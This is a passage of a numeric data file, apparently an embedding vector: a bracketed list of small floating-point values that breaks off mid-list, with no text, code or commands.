[ -0.029231389984488487, 0.014037002809345722, -0.010920966044068336, 0.025343764573335648, 0.03211001306772232, 0.02059551700949669, -0.026159869506955147, 0.0409536212682724, -0.004303098190575838, 0.030952630564570427, -0.015224064700305462, 0.01320606004446745, 0.02228708006441593, 0.0010006558150053024, 0.018295586109161377, -0.0054345158860087395, 0.0032699836883693933, 0.021560005843639374, -0.0029472513124346733, 0.015965977683663368, 0.04852113872766495, -0.04641410708427429, -0.02592245675623417, 0.06338908523321152, -0.02126323990523815, 0.02231675758957863, -0.02052132599055767, -0.0027079840656369925, -0.0000937824952416122, 0.027673372998833656, -0.010483236983418465, 0.004225197248160839, -0.005338067188858986, 0.010594524443149567, 0.04276389256119728, -0.00364094041287899, 0.036591172218322754, 0.0699772760272026, -0.021841932088136673, 0.015268579125404358, 0.0006227436242625117, -0.04920370131731033, -0.029869435355067253, 0.012568013742566109, -0.007589774671941996, 0.0164259634912014, 0.005916759837418795, -0.004273421596735716, -0.0500643216073513, 0.000711309548933059, 0.022717390209436417, -0.005356615409255028, -0.01698981784284115, -0.05680089443922043, -0.0004444525402504951, -0.025863103568553925, 0.012887036427855492, 0.01802849769592285, 0.016129199415445328, 0.012048674747347832, -0.0199129581451416, 0.00972648523747921, 0.013591854833066463, 0.01921555958688259, 0.0017982127610594034, 0.012323183007538319, -0.007931054569780827, 0.03240678086876869, -0.01437828317284584, 0.04187359660863876, -0.0029101555701345205, -0.04495995491743088, 0.002010585507377982, 0.03211001306772232, -0.0009858175180852413, -0.006747703067958355, 0.034098342061042786, 0.04119103401899338, -0.010141956619918346, 0.047571491450071335, -0.04733407869935036, 0.030982306227087975, -0.03534475713968277, 0.024379275739192963, -0.0021552585531026125, 0.01605500653386116, -0.0376892052590847, -0.07840541750192642, -0.03789693862199783, -0.036383435130119324, 0.016826597973704338, 0.013896038755774498, 0.0011759328190237284, -0.0006041957531124353, 0.008865865878760815, 0.017627863213419914, -0.03665052354335785, -0.005534674506634474, -0.05092494189739227, -0.0019475228618830442, -0.03481058031320572, -0.013606692664325237, -0.01368088461458683, -0.00034985857200808823, -0.00484469486400485, -0.006309974007308483, 0.0007043540826998651, -0.01835493929684162, 0.017583349719643593, 0.12665946781635284, 0.02203482948243618, 0.0037707751616835594, -0.0061356243677437305, 0.007975569926202297, 0.0034461880568414927, 0.013985068537294865, -0.01451924629509449, -0.020788414403796196, -0.046918608248233795, -0.023726392537355423, -0.022628361359238625, -0.01621822826564312, -0.017256906256079674, 0.018399454653263092, -0.024052834138274193, 0.0425264798104763, -0.015609859488904476, -0.005237909033894539, -0.035077668726444244, 0.006013208534568548, -0.03961817920207977, -0.019482648000121117, 0.021248402073979378, -0.024438628926873207, 0.006024337373673916, 0.004651797469705343, -0.0194084569811821, 0.024646366015076637, 0.036353759467601776, 0.024794748052954674, -0.06273620575666428, -0.01793946698307991, 0.03466219827532768, 0.0077084810473024845, -0.010008412413299084, 0.01900782249867916, 0.002761772833764553, 0.007385748438537121, -0.03267386928200722, -0.01789495348930359, -0.006254330277442932, -0.03961817920207977, 0.018443968147039413, 0.014734401367604733, 0.059412430971860886, -0.007982988841831684, 0.010601943358778954, 0.04139877110719681, -0.013562178239226341, -0.016396287828683853, -0.014244738034904003, -0.035819582641124725, 0.0006941527826711535, -0.03952914848923683, -0.029231389984488487, -0.029661700129508972, 0.03914335370063782, 0.00843555573374033, -0.015127615071833134, 0.02629341371357441, -0.001318751135841012, -0.008472652174532413, 0.03587893396615982, 0.0387575589120388, -0.06101496145129204, -0.021975476294755936, 0.020551003515720367, 0.01884460262954235, -0.024349600076675415, 0.005267585627734661, -0.020862607285380363, 0.01609952189028263, -0.007537840865552425, -0.021812256425619125, 0.018933631479740143, -0.01069097314029932, 0.012278667651116848, -0.04923337697982788, 0.029498478397727013, -0.007541550323367119, 0.003496267134323716, -0.01698981784284115, -0.001238068100064993, -0.005130331497639418, 0.04332774505019188, -0.019200719892978668, -0.025981809943914413, 0.0024297665804624557, -0.006762541364878416, 0.0164259634912014, 0.011685136705636978, -0.008635872974991798, -0.022761905565857887, -0.009251660667359829, -0.0506281740963459, 0.008368783630430698, -0.012501241639256477, 0.053595829755067825, 0.009333271533250809, 0.017583349719643593, -0.022168373689055443, -0.024676041677594185, 0.003935850691050291, 0.005371453240513802, -0.02354833297431469, 0.012686720117926598, -0.019482648000121117, -0.005608865991234779, -0.033682871609926224, -0.015135034918785095, 0.03567120060324669, -0.0049596913158893585, 0.010950642637908459, -0.02531408704817295, -0.04771987348794937, -0.024275409057736397, -0.004833566024899483, 0.004551639314740896, -0.024972807615995407, 0.005486450158059597, 0.027910783886909485, 0.01433376781642437, -0.006194977555423975, 0.011826100759208202, 0.011106444522738457, 0.009236822836101055, 0.011662879958748817, 0.004640668630599976, -0.005564351100474596, 0.02522505819797516, -0.0025818587746471167, 0.0468592531979084, -0.0322880744934082, -0.016129199415445328, 0.005671928636729717, 0.0743694081902504, -0.015550506301224232, -0.010824517346918583, -0.020877445116639137, 0.007467358838766813, -0.012159961275756359, -0.017271745949983597, -0.005564351100474596, 0.00013632660557050258, 0.013562178239226341, -0.003205066081136465, 0.026515986770391464, -0.0005337140173651278, -0.017924629151821136, -0.011002576909959316, 0.014667629264295101, -0.0019326845649629831, -0.03145712986588478, 0.015097939409315586, -0.004340193700045347, -0.005742410197854042, -0.0008694298448972404, 0.01320606004446745, -0.014749239198863506, -0.02023939974606037, 0.041428446769714355, -0.012211895547807217, -0.025788912549614906, -0.03501831367611885, 0.002615245059132576, 0.016737567260861397, -0.005048721097409725, 0.012130284681916237, 0.005052430555224419, -0.006699478719383478, 0.004317936487495899, 0.006499161943793297, 0.0218270942568779, 0.03338610753417015, -0.0035389272961765528, -0.01492729876190424, 0.012070932425558567, -0.005089526530355215, -0.014430216513574123, 0.005415968131273985, 0.0026245189364999533, 0.032258398830890656, -0.05733507126569748, 0.02277674339711666, 0.010527752339839935, 0.021975476294755936, -0.007270751986652613, 0.0017379323253408074, -0.026159869506955147, 0.01437828317284584, -0.01716787740588188, 0.005683057010173798, -0.027094678953289986, 0.012708977796137333, -0.029068170115351677, 0.0062914262525737286, -0.03685826063156128, -0.0022999318316578865, -0.028088843449950218, 0.013213478960096836, 0.03629440814256668, -0.058551810681819916, -0.03576022759079933, -0.019601354375481606, -0.025121189653873444, 0.006695768795907497, 0.013035419397056103, 0.011188055388629436, -0.019601354375481606, 0.01617371290922165, -0.015372446738183498, 0.00589821208268404, -0.024156702682375908, 0.015476315282285213, 0.025210220366716385, 0.01650015451014042, -0.01058710552752018, 0.02023939974606037, -0.07092692703008652, 0.02022456005215645, -0.006721735931932926, 0.0058796643279492855, 0.012033835984766483, -0.0463547520339489, -0.002720967633649707, -0.011640622280538082, -0.018829762935638428, -0.005760957952588797, 0.013406376354396343, 0.010342273861169815, -0.010520332492887974, 0.033356428146362305, 0.020921960473060608, 0.0021552585531026125, -0.019972309470176697, -0.012434469535946846, 0.006877537816762924, -0.019319426268339157, -0.009192307479679585, -0.011336437426507473, 0.0010145666310563684, 0.04406965896487236, 0.014059260487556458, 0.05050946772098541, 0.0312790721654892, -0.0082129817456007, 0.008494908921420574, -0.01761302538216114, 0.01123998872935772, 0.0025670204777270555, -0.011892872862517834, -0.013992487452924252, -0.012894456274807453, 0.025462470948696136, -0.011826100759208202, 0.011395790614187717, 0.0017360774800181389, 0.0005768377450294793, -0.0010748471831902862, -0.007159464992582798, -0.035077668726444244, 0.06653480231761932, -0.03166486695408821, 0.009719066321849823, -0.0009988009696826339, -0.01851815916597843, 0.031219718977808952, 0.010394207201898098, -0.03754081949591637, 0.0063767461106181145, -0.043921276926994324, 0.02461668848991394, 0.032377105206251144, -0.04694828391075134, -0.0007284662569873035, 0.03691761568188667, -0.02436443790793419, 0.0699772760272026, -0.020001986995339394, -0.01042388379573822, -0.061489786952733994, 0.04709666594862938, -0.04356515780091286, -0.04754181578755379, -0.013666045852005482, 0.003375706262886524, -0.04285292327404022, -0.024868939071893692, 0.030418451875448227, -0.041754890233278275, 0.024765070527791977, -0.003205066081136465, -0.019185882061719894, 0.03451381251215935, -0.009555845521390438, 0.026812752708792686, 0.012545756995677948, 0.018740734085440636, 0.034543491899967194, -0.012842522002756596, 0.025699881836771965, -0.042496804147958755, -0.008457813411951065, 0.0061430432833731174, 0.04377289488911629, 0.006888666655868292, -0.01091354712843895, -0.00258000404573977, -0.04116135835647583, 0.04243744909763336, -0.029513318091630936, -0.003329336643218994, 0.009392624720931053, 0.017064008861780167, 0.029468802735209465, 0.028964301571249962, -0.027673372998833656, 0.02022456005215645, 0.005987241864204407, -0.024305084720253944, 0.010542590171098709, -0.011225150898098946, -0.024587012827396393, -0.0022368691861629486, 0.0019605064298957586, -0.037244055420160294, -0.054990626871585846, -0.04608766362071037, -0.030032657086849213, -0.0005351050640456378, -0.036146022379398346, 0.036146022379398346, -0.006443518213927746, -0.008561681024730206, 0.020862607285380363, -0.028726888820528984, -0.014845688827335835, -0.005961274728178978, 0.016648538410663605, -0.01798398233950138, -0.00506726885214448, 0.013747656717896461, 0.013146706856787205, 0.005953855346888304, 0.00506726885214448, -0.0016980544896796346, -0.021634196862578392, -0.013347023166716099, 0.04988626018166542, 0.016158875077962875, -0.007790091447532177, 0.021114857867360115, 0.0019827636424452066, 0.012568013742566109, 0.05421903729438782, 0.02773272432386875, -0.00950391124933958, -0.023488979786634445, 0.011291923001408577, -0.03148680552840233, 0.014697305858135223, 0.012471565045416355, 0.0006269168807193637, 0.013710561208426952, 0.0005995588144287467, 0.02687210589647293, 0.019527161493897438, -0.015980815514922142, -0.026530824601650238, -0.05964984372258186, 0.007467358838766813, -0.030047494918107986, -0.008361364714801311, -0.017316259443759918, 0.008472652174532413, -0.013792171142995358, -0.024349600076675415, -0.0009130172547884285, 0.014422797597944736, -0.0019994566682726145, 0.031961631029844284, 0.012753492221236229, -0.015921462327241898, -0.03231775015592575, 0.004499705042690039, -0.00561999436467886, -0.007541550323367119, 0.020921960473060608, 0.031190041452646255, -0.0022275950759649277, -0.00650287140160799, -0.015995653346180916, 0.02317737601697445, 0.012248991057276726, 0.016455641016364098, -0.041428446769714355, -0.028103681281208992, 0.054337743669748306, 0.010920966044068336, -0.025610852986574173, -0.007066725753247738, -0.0247799102216959, -0.005579189397394657, -0.027881108224391937, -0.01220447663217783, -0.027391444891691208, 0.02093679830431938, -0.0031234556809067726, 0.045405104756355286, 0.011403209529817104, 0.0005963129224255681, -0.018414292484521866, -0.004436642397195101, 0.02245030179619789, 0.03166486695408821, 0.01478633563965559, 0.0226431991904974, -0.010639038868248463, 0.03380157798528671, -0.018280748277902603, -0.007782672066241503, 0.0010117845376953483, -0.023904452100396156, 0.007040758617222309, -0.013443471863865852, 0.00728188082575798, 0.013079934753477573, 0.034632518887519836, -0.008020084351301193, -0.014637952670454979, -0.018162041902542114, 0.046176694333553314, -0.0441586896777153, 0.020180046558380127, -0.010253244079649448, 0.03169454261660576, -0.007945893332362175, 0.026486311107873917, -0.013324765488505363, 0.0007525784894824028, 0.012063512578606606, -0.012115446850657463, 0.01716787740588188, 0.01042388379573822, 0.010772583074867725, 0.02420121803879738, -0.002194209024310112, -0.0027061293367296457, 0.003969237208366394, 0.020298752933740616, 0.008947476744651794, 0.007804929744452238, -0.01908201351761818, -0.01928975060582161, 0.0020402621012181044, -0.0012000449933111668, -0.008316850289702415, 0.03240678086876869, -0.033029988408088684, 0.001212101080454886, 0.01744980551302433, -0.0006283079856075346, 0.026234060525894165, -0.008554262109100819, -0.015209225937724113, 0.007604612968862057, 0.004815018270164728, -0.012968647293746471, -0.01271639671176672, -0.01736077480018139, -0.0006890521035529673, -0.039380766451358795, -0.005920469295233488, 0.02724306285381317, 0.017345936968922615, -0.024438628926873207, 0.01040162704885006, 0.009592941030859947, 0.019749736413359642, -0.019690383225679398, -0.005423387512564659, 0.01060936227440834, -0.019393617287278175, -0.02043229714035988, -0.01060936227440834, -0.019393617287278175, 0.022346433252096176, 0.004763084463775158, 0.006436099298298359, -0.0047816322185099125, -0.017954306676983833, 0.04947078973054886, 0.010950642637908459, -0.020669709891080856, -0.01921555958688259, 0.01740529015660286, 0.02752498909831047, 0.006528838537633419, -0.014467312954366207, 0.03374222293496132, 0.007181722205132246, 0.02326640672981739, 0.03469187393784523, 0.0007502599619328976, 0.011722233146429062, -0.0048595331609249115, 0.035522814840078354, 0.01437828317284584, -0.007879121229052544, 0.028563668951392174, 0.020417459309101105, -0.058789223432540894, 0.01733109913766384, -0.035166699439287186, 0.023444466292858124, 0.03199130669236183, -0.013332185335457325, -0.026041163131594658, -0.007111240644007921, -0.01042388379573822, -0.029676537960767746, 0.035285405814647675, -0.0012148832902312279, -0.02571471966803074, -0.029839759692549706, -0.005612575449049473, 0.020788414403796196, 0.006139333825558424, -0.029557831585407257, -0.007307847496122122, -0.0034369141794741154, 0.014764077961444855, -0.016885951161384583, 0.010935804806649685, -0.021634196862578392, 0.007678804453462362, -0.0007423771312460303, 0.009081020951271057, 0.024868939071893692, 0.04104265198111534, -0.018859440460801125, -0.004444061778485775, -0.006480614189058542, 0.007174303289502859, 0.01989811845123768, -0.005827730055898428, 0.05418935790657997, 0.05297262221574783, -0.023310920223593712, -0.018740734085440636, -0.004232616163790226, -0.040033649653196335, -0.0052490378729999065, -0.01580275595188141, -0.0001154602796304971, -0.005300971679389477, -0.014318929985165596, 0.004722279030829668, 0.01201899815350771, 0.008672968484461308, 0.009600359946489334, 0.005059849936515093, 0.012174800038337708, -0.013777333311736584, -0.0070222108624875546, -0.030359098687767982, 0.017746569588780403, 0.00885102804750204, -0.028192711994051933, 0.004087943118065596, -0.002609680639579892, 0.002320334315299988, -0.005794344004243612, -0.0027803205884993076, -0.045523811131715775, 0.010891289450228214, -0.007641708478331566, -0.018859440460801125, -0.021649034693837166, -0.014266995713114738, 0.02363736368715763, -0.014682467095553875, 0.018829762935638428, 0.0349886380136013, -0.009273918345570564, -0.03451381251215935, 0.018577512353658676, 0.0002768264675978571, 0.002476136200129986, 0.000021866160750505514, -0.024275409057736397, 0.006814475171267986, -0.006803346332162619, -0.026842428371310234, 0.014222481288015842, 0.034751225262880325, -0.007111240644007921, 0.013028000481426716, 0.004755665082484484, -0.01826590858399868, -0.010520332492887974, 0.02571471966803074, -0.010520332492887974, 0.018740734085440636, 0.012382535263895988, -0.03706599771976471, 0.008532004430890083, 0.00455534877255559, -0.01525374036282301, 0.0125309182330966, -0.018740734085440636, -0.02932042069733143, -0.013962811790406704, -0.03308933973312378, 0.010052927769720554, -0.016945304349064827, -0.01046839915215969, 0.021040664985775948, 0.0072336564771831036, 0.008383622393012047, -0.021960638463497162, -0.04006332531571388, 0.0024724265094846487, 0.015906624495983124, -0.009778419509530067, -0.004039718769490719, 0.007834605872631073, -0.0010377514408901334, 0.0010173488408327103, 0.022954802960157394, 0.00958552211523056, -0.013220897875726223, -0.0012575433356687427, -0.025195380672812462, -0.0035834419541060925, -0.010193890891969204, 0.02112969569861889, -0.011254827491939068, -0.04430707171559334, 0.03133842349052429, 0.004195520654320717, 0.043149687349796295, 0.013176383450627327, -0.02654566429555416, -0.0349886380136013, 0.0008202780736610293, 0.018206557258963585, 0.003008458996191621, -0.013792171142995358, 0.002032842952758074, 0.0022962221410125494, 0.016025330871343613, -0.028192711994051933, -0.01712336204946041, -0.004010042175650597, -0.00017527706222608685, 0.00755638862028718, -0.026323089376091957, 0.037214379757642746, 0.007901377975940704, 0.003210630500689149, -0.015090519562363625, -0.02075873874127865, 0.006139333825558424, 0.016366610303521156, -0.03789693862199783, 0.016069846227765083, 0.018176879733800888, 0.022865772247314453, -0.008198143914341927, -0.03703631833195686, 0.009355529211461544, -0.05380356311798096, 0.018043335527181625, 0.0055124168284237385, -0.011091606691479683, 0.024319922551512718, -0.023118022829294205, 0.0018418001709505916, 0.022658037021756172, 0.02293996512889862, -0.01091354712843895, 0.040775563567876816, -0.024601850658655167, -0.007797510363161564, -0.021960638463497162, 0.008799093775451183, 0.006918343249708414, -0.015446638688445091, -0.009934221394360065, 0.016411125659942627, 0.0031605514232069254, -0.026812752708792686, -0.03160551190376282, -0.018829762935638428, -0.008064599707722664, -0.0269166212528944, 0.013933135196566582, -0.029112683609128, -0.004191811196506023, -0.005627413745969534, 0.002730241511017084, 0.017182715237140656, 0.004573896527290344, 0.0023833969607949257, 0.005022753961384296, 0.021649034693837166, -0.024913454428315163, -0.010564847849309444, 0.026441795751452446, -0.015654373914003372, -0.0011156523833051324, -0.013339604251086712, -0.048224374651908875, 0.01970522105693817, -0.006350779440253973, 0.01040162704885006, 0.017583349719643593, 0.012597690336406231, 0.008012665435671806, -0.004993077367544174, -0.013829266652464867, -0.006384165491908789, 0.003772629890590906, -0.018562674522399902, 0.01480859238654375, 0.00037652108585461974, 0.012130284681916237, -0.015238902531564236, 0.028074005618691444, -0.020773576572537422, -0.018711058422923088, 0.0011954080546274781, -0.013962811790406704, -0.01905233785510063, -0.026234060525894165, -0.004930015187710524, 0.002637502271682024, 0.003412802005186677, -0.00280999718233943, 0.013235735706984997, 0.029023654758930206, -0.015209225937724113, 0.04481157287955284, -0.008442975580692291, 0.02871205098927021, -0.01175190880894661, -0.022168373689055443, 0.03955882415175438, -0.006973986513912678, 0.012093189172446728, 0.008917800150811672, -0.012256409972906113, -0.011521915905177593, 0.008925219066441059, 0.014318929985165596, -0.007478487677872181, -0.05344744399189949, -0.0023017865605652332, -0.008391041308641434, -0.014215062372386456, -0.028964301571249962, 0.006202396471053362, -0.005045011639595032, -0.03047780506312847, -0.002366703934967518, 0.009496492333710194, -0.014103774912655354, 0.012041255831718445, 0.026975972577929497, 0.0032180496491491795, 0.014905041083693504, -0.015951139852404594, 0.0007034267182461917, 0.0044069658033549786, -0.016678214073181152, -0.013539920561015606, -0.024186378344893456, -0.034098342061042786, 0.008413298986852169, 0.01740529015660286, -0.016247903928160667, -0.03543378785252571, -0.02059551700949669, 0.03133842349052429, 0.05270553380250931, -0.0006139333709143102, -0.030952630564570427, -0.014556341804564, -0.01891879364848137, -0.012367697432637215, 0.0017156748799607158, 0.004948562942445278, -0.01810268871486187, -0.0247799102216959, 0.008079437538981438, 0.036561496555805206, -0.005074688233435154, -0.019260073080658913, 0.022583846002817154, 0.0013985069235786796, -0.007975569926202297, -0.013117030262947083, -0.04018203169107437, 0.0002833181933965534, 0.009407462552189827, -0.03460284322500229, 0.02759918011724949, -0.006373036652803421, 0.05202297121286392, 0.008672968484461308, -0.006146753206849098, -0.0029843468219041824, 0.03469187393784523, -0.008368783630430698, -0.013213478960096836, -0.027302416041493416, 0.003735534381121397, -0.012849940918385983, 0.0125309182330966, 0.0009487218339927495, -0.017375612631440163, -0.008940056897699833, 0.01945297047495842, 0.03466219827532768, -0.008710063993930817, -0.025136027485132217, -0.009236822836101055, -0.01752399653196335, -0.04225939139723778, -0.01568405143916607, 0.024349600076675415, 0.022717390209436417, -0.002500248374417424, -0.009251660667359829, 0.016693053767085075, -0.005553222261369228, -0.01838461495935917, -0.013844105415046215, -0.021812256425619125, -0.03267386928200722, -0.03231775015592575, -0.012738654389977455, -0.020996151491999626, -0.015609859488904476, 0.010030670091509819, -0.01921555958688259, -0.009489073418080807, -0.006028046831488609, 0.012953809462487698, 0.023207053542137146, 0.007908797822892666, -0.016411125659942627, -0.013940554112195969, 0.008376202546060085, 0.0038134350907057524, -0.023815421387553215, 0.00016055471496656537, -0.02064003236591816, -0.022138698026537895, -0.002381542231887579, -0.002246143063530326, 0.005122912582010031, 0.04128006473183632, 0.005653380416333675, 0.043921276926994324, -0.009822933934628963, -0.0282965786755085, -0.009674551896750927, 0.002101469784975052, -0.019274910911917686, -0.00429196935147047, 0.013881200924515724, -0.02326640672981739, -0.015609859488904476, -0.026189545169472694, 0.009021667763590813, 0.026041163131594658, -0.0002682480844669044, -0.0066104489378631115, 0.016856273636221886, 0.011032253503799438, 0.010275501757860184, -0.051993295550346375, 0.003453607205301523, -0.016069846227765083, -0.005263876169919968, -0.02470571920275688, -0.02494313009083271, -0.03181324899196625, -0.03047780506312847, -0.0011035962961614132, 0.023073509335517883, 0.010928384959697723, -0.02908300794661045, -0.0019530871650204062, 0.008324269205331802, 0.015327932313084602, -0.029913950711488724, -0.005486450158059597, -0.01921555958688259, 0.004944853018969297, 0.006669802125543356, -0.0156395360827446, 0.005883373785763979, -0.017835600301623344, -0.021693550050258636, 0.012983485125005245, 0.01190029177814722, 0.043476127088069916, -0.015461476519703865, -0.005716443061828613, -0.011878034099936485, -0.00639900378882885, 0.005716443061828613, 0.03650214150547981, -0.006462066434323788, -0.006098528858274221, 0.0058240205980837345, 0.01580275595188141, -0.006413842085748911, 0.011180635541677475, -0.005441935267299414, 0.004614701960235834, -0.007293009199202061, -0.007300428580492735, 0.019304588437080383, -0.022761905565857887, -0.010334854945540428, 0.012241572141647339, 0.037867262959480286, 0.008020084351301193, -0.046265725046396255, -0.01666337624192238, -0.0015515264822170138, 0.011989321559667587, -0.005738700740039349, 0.0090290866792202, 0.008494908921420574, -0.007827186957001686, 0.007337524089962244, -0.010334854945540428, 0.05481256544589996, -0.014252157881855965, -0.014956975355744362, -0.012263829819858074, -0.004210358951240778, -0.012293506413698196, -0.01020130980759859, -0.014860526658594608, -0.009192307479679585, -0.008613615296781063, 0.012627366930246353, -0.04190327227115631, -0.014845688827335835, -0.024260569363832474, -0.0015255595790222287, 0.004696312360465527, -0.0032143399585038424, 0.004803889896720648, 0.016396287828683853, 0.008376202546060085, -0.0065548052079975605, -0.019156206399202347, 0.02822238765656948, -0.026753399521112442, 0.0033590132370591164, -0.015431799925863743, -0.015090519562363625, -0.010631619952619076, -0.017093686386942863, -0.01838461495935917, -0.0212929155677557, 0.016455641016364098, -0.04786825552582741, 0.03047780506312847, 0.0044069658033549786, -0.028237225487828255, 0.021812256425619125, -0.01814720407128334, -0.014793754555284977, -0.026441795751452446, 0.009733905084431171, -0.015357608906924725, -0.02256900817155838, 0.0017852293094620109, 0.023859936743974686, 0.08095759898424149, 0.004232616163790226, -0.002401944948360324, -0.024765070527791977, 0.00516000809147954, 0.008940056897699833, 0.016440803185105324, 0.011336437426507473, 0.011432886123657227, 0.014860526658594608, 0.01654466986656189, -0.003637230722233653, 0.0053269388154149055, 0.0030474094673991203, 0.019304588437080383, 0.010000993497669697, -0.014207642525434494, -0.015268579125404358, 0.00131318683270365, -0.00043587415711954236, 0.008717482909560204, 0.004410675726830959, 0.02724306285381317, -0.0015403978759422898, 0.02268771454691887, -0.030626187101006508, 0.0015005199238657951, -0.03837176412343979, -0.01675240509212017, -0.014356025494635105, -0.007990407757461071, -0.010824517346918583, -0.028697213158011436, -0.0049782395362854, 0.018903955817222595, -0.002288802992552519, 0.027139194309711456, -0.022865772247314453, -0.0035111054312437773, -0.01703433319926262, -0.0016118070343509316, -0.009941640309989452, -0.008650710806250572, 0.011158378794789314, -0.004870662000030279, -0.01768721640110016, 0.04549413174390793, 0.011514496989548206, -0.0017546253511682153, -0.0024483143351972103, -0.010972900316119194, -0.03457316756248474, 0.018814925104379654, 0.032822251319885254, -0.00035820508492179215, 0.02535860240459442, -0.011648041196167469, -0.006536257453262806, -0.017420127987861633, -0.00521194189786911, -0.0030715216416865587, 0.024275409057736397, -0.005798053927719593, 0.03166486695408821, 0.0077084810473024845, -0.02605600096285343, -0.016292419284582138, 0.01419280469417572, 0.0007433045539073646, 0.01822139509022236, 0.024186378344893456, -0.010386788286268711, 0.00011140294373035431, 0.004878080915659666, 0.004889209754765034, 0.035493139177560806, 0.0021608229726552963, 0.01814720407128334, -0.03727373108267784, -0.003297805320471525, 0.02727273851633072, 0.01945297047495842, -0.005219361279159784, 0.02457217313349247, -0.018622027710080147, 0.03451381251215935, -0.010535171255469322, 0.004273421596735716, 0.012582852505147457, -0.0007034267182461917, 0.005152589175850153, -0.0006408277549780905, 0.012026417069137096, 0.026515986770391464, 0.0117148132994771, 0.02650114893913269, -0.004818727727979422, -0.025566337630152702, -0.009800677187740803, -0.008865865878760815, 0.024468306452035904, -0.0019289749907329679, 0.026070838794112206, 0.006117076613008976, -0.03255516290664673, 0.026441795751452446, 0.004488576669245958, 0.01905233785510063, -0.0024520240258425474, 0.0038653691299259663, -0.026886943727731705, -0.01891879364848137, 0.013688303530216217, -0.0065325479954481125, 0.0008666476351208985, -0.0002107497857650742, 0.013421214185655117, 0.00280999718233943, -0.01058710552752018, -0.02526957169175148, -0.03199130669236183, -0.005683057010173798, 0.02768821083009243, -0.025180542841553688, 0.0038542405236512423, -0.0038023064844310284, 0.00322546879760921, -0.024631526321172714, 0.03706599771976471, 0.03001781925559044, 0.005697895307093859, 0.017108524218201637, -0.012924132868647575, 0.004636959172785282, 0.013628950342535973, -0.018280748277902603, 0.02347414195537567, 0.008761998265981674, -0.01087645161896944, 0.006762541364878416, -0.006369327194988728, 0.034632518887519836, 0.02236127108335495, 0.019230397418141365, -0.0022684005089104176, -0.0020365524105727673, 0.008494908921420574, 0.010987738147377968, 0.014934717677533627, 0.0125309182330966, -0.009281337261199951, -0.022999316453933716, 0.023785745725035667, 0.03810467571020126, 0.010824517346918583, 0.007300428580492735, 0.01584727130830288, -0.0242457315325737, -0.0018037770641967654, 0.011128702200949192, -0.0027487892657518387, 0.020788414403796196, 0.023088347166776657, 0.0007159464876167476, -0.0015682196244597435, 0.031308747828006744, -0.015149872750043869, -0.06594126671552658, -0.010661296546459198, -0.03632408380508423, 0.017672378569841385, 0.013955391943454742, -0.0010544444667175412, -0.0024316213093698025, 0.01021614857017994, 0.019675545394420624, -0.017716893926262856, 0.005798053927719593, 0.021144533529877663, -0.021441299468278885, -0.00207364815287292, 0.028934625908732414, -0.002162677701562643, -0.0015682196244597435, 0.026812752708792686, -0.03050748072564602, -0.01079484075307846, -0.0020662290044128895, -0.04582057520747185, 0.03534475713968277, 0.006480614189058542, 0.04582057520747185, -0.014771496877074242, 0.010846775025129318, -0.016040168702602386, -0.019230397418141365, -0.006773669738322496, 0.0030622477643191814, -0.019156206399202347, -0.0006496379501186311, -0.0017128926701843739, -0.009652294218540192, -0.014029583893716335, 0.0029398321639746428, -0.0027858850080519915, -0.030448129400610924, -0.000850881973747164, 0.025655368342995644, -0.009733905084431171, -0.003038135590031743, -0.033237721771001816, 0.008539424277842045, 0.023859936743974686, 0.005048721097409725, 0.010713230818510056, 0.009822933934628963, 0.011662879958748817, -0.022005153819918633, 0.010038089007139206, 0.01492729876190424, -0.03665052354335785, 0.025863103568553925, 0.011967063881456852, 0.0077084810473024845, -0.015083100646734238, 0.010698392055928707, 0.03034426085650921, -0.02526957169175148, 0.005634832661598921, 0.009236822836101055, -0.0014995925594121218, -0.004521962720900774, 0.005134040955454111, 0.004507124423980713, -0.0038060161750763655, -0.0020959055982530117, 0.006499161943793297, 0.00630626454949379, -0.00039112751255743206, -0.0099564790725708, 0.00576466741040349, -0.0006176429451443255, -0.03187260404229164, -0.00829459261149168, -0.012026417069137096, -0.00022222627012524754, 0.006907214410603046, 0.027539826929569244, -0.0054827407002449036, 0.032050661742687225, -0.02056584134697914, 0.013732817955315113, 0.003607554128393531, -0.024483144283294678, -0.0028730598278343678, 0.023088347166776657, 0.009793257340788841, 0.010067765600979328, 0.015038586221635342, 0.0172420684248209, 0.011039672419428825, -0.010290339589118958, -0.008784255012869835, 0.018043335527181625, -0.00759719405323267, 0.0013475003652274609, -0.002715403214097023, -0.0005647815996780992, 0.019482648000121117, -0.004948562942445278, 0.015327932313084602, 0.011440305970609188, 0.02212386019527912, 0.0009552135597914457, -0.018369777128100395, 0.012723815627396107, -0.0072336564771831036, -0.022658037021756172, -0.016069846227765083, -0.0038950457237660885, 0.002850802382454276, 0.040033649653196335, 0.006417551543563604, -0.018295586109161377, 0.008205562829971313, -0.014712143689393997, -0.041012976318597794, -0.007348652929067612, -0.03267386928200722, -0.012738654389977455, -0.0016600313829258084, 0.014281834475696087, -0.014934717677533627, -0.024379275739192963, 0.030685540288686752, -0.004996787291020155, -0.01875557191669941, 0.04297162592411041, -0.016841435804963112, 0.008242658339440823, 0.02096647396683693, 0.017553672194480896, 0.007018501404672861, 0.011967063881456852, 0.0021904995664954185, -0.007222527638077736, -0.020669709891080856, -0.0022238856181502342, 0.013710561208426952, 0.004343903157860041, -0.003544491482898593, -0.019927795976400375, -0.025670206174254417, -0.025833426043391228, 0.013725399039685726, 0.010787421837449074, 0.0031253104098141193, -0.00571273360401392, -0.02268771454691887, 0.005286133382469416, 0.0005875027272850275, -0.008494908921420574, -0.0064323898404836655, -0.020209722220897675, -0.002021714113652706, 0.010082604363560677, -0.00520081352442503, -0.001235285890288651, 0.009266499429941177, -0.02592245675623417, 0.01908201351761818, 0.020180046558380127, 0.03822338208556175, -0.010268081910908222, 0.011314180679619312, -0.009043925441801548, 0.005757248494774103, -0.00025294613442383707, -0.012248991057276726, -0.002637502271682024, -0.032584838569164276, 0.029112683609128, -0.015224064700305462, -0.012953809462487698, 0.01152933482080698, 0.009118116460740566, 0.004280840512365103, 0.013651208020746708, 0.006684640422463417, -0.029928788542747498, -0.0334157831966877, -0.016084684059023857, -0.008064599707722664, -0.0014495134819298983, 0.006165300961583853, 0.006054013967514038, 0.0156395360827446, -0.0006028047064319253, 0.017345936968922615, -0.01390345860272646, -0.015179549343883991, 0.01908201351761818, 0.0117148132994771, -0.0037077125161886215, 0.005074688233435154, -0.008391041308641434, -0.0073412335477769375, -0.012041255831718445, 0.0010767019120976329, -0.01707884855568409, -0.024483144283294678, 0.007560098078101873, 0.005237909033894539, 0.013117030262947083, -0.0161440372467041, 0.022049667313694954, 0.012226734310388565, -0.014986651949584484, -0.014630533754825592, 0.030982306227087975, 0.0007460867054760456, 0.00705559691414237, 0.004484866745769978, 0.008502327837049961, 